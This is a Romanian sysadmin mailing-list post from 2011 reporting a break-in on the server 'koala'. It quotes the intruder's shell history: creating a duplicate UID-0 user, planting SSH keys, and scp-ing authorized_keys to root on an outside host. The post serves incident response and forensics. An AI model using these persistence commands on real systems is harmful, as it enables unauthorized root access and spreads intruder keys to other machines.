[rosedu-admins] [koala] Acces pe baza de chei pentru contul root
Razvan Deaconescu
razvan.deaconescu at cs.pub.ro
Tue Jun 7 19:33:05 EEST 2011
On 05/23/2011 01:31 PM, Razvan Deaconescu wrote:
> Salut!
>
> În fișierul ~/.ssh/authorized_keys de pe koala nu era (până acum câteva
> minute) decât cheia publică pentru root at koala. În concluzie, nimeni nu
> se mai putea autentifica pe bază de chei.
>
> Am adăugat cheia mea publică acolo. Cei care aveau acces la root at koala
> sunt rugați să-mi răspundă ca să le adaug cheia publică.
>
> Își asumă cineva "responsabilitatea" pentru această deficiență? A fost o
> eroare de configurare sau chiar s-a dorit să se realizeze ceva (nu mă
> prind ce)?
Salut!
Se pare că cineva a dat iama în koala. Am copiat în directorul
/root/attack/ fișierele suspecte și istoria de comenzi. A fost creat
utilizatorul lavazor care era un id pentru root. Iată un snippet din
istorie:
---
/usr/sbin/useradd -o -u 0 lavazor
passwd lavazor
id
cd ~/.ssh
ssh-keygen -t rsa
cd ~/.ssh
ssh-keygen -t rsa
ls -la
cat id_rsa.pub > authorized_keys
ls -la
scp authorized_keys root at 141.85.166.60:/root/.ssh
---
Adresa 141.85.166.60 este mail.upb.ro:
---
mamba:~# host 141.85.166.60
Name: mail.upb.ro
Address: 141.85.166.60
---
Nu-mi dau seama ce s-a întâmplat. O să văd dacă depistez pe cineva de
acolo. Deocamdată, koala.cs.pub.ro este blocat din RoEduNet (am avut
niște probleme cu site-ul P2P-Next pe care l-am dezactivat acum). Am dat
mai multe mail-uri/ping-uri pentru rezolvarea problemei. Sper să se
rezolve cât mai curând.
Am rulat rkhunter și pare OK (primesc warning-uri de inode schimbat, dar
nu și de conținut de fișier). Din păcate, fără acces la Internet nu pot
să fac actualizarea bazei de date de probleme pentru rkhunter.
Răzvan
More information about the rosedu-admins
mailing list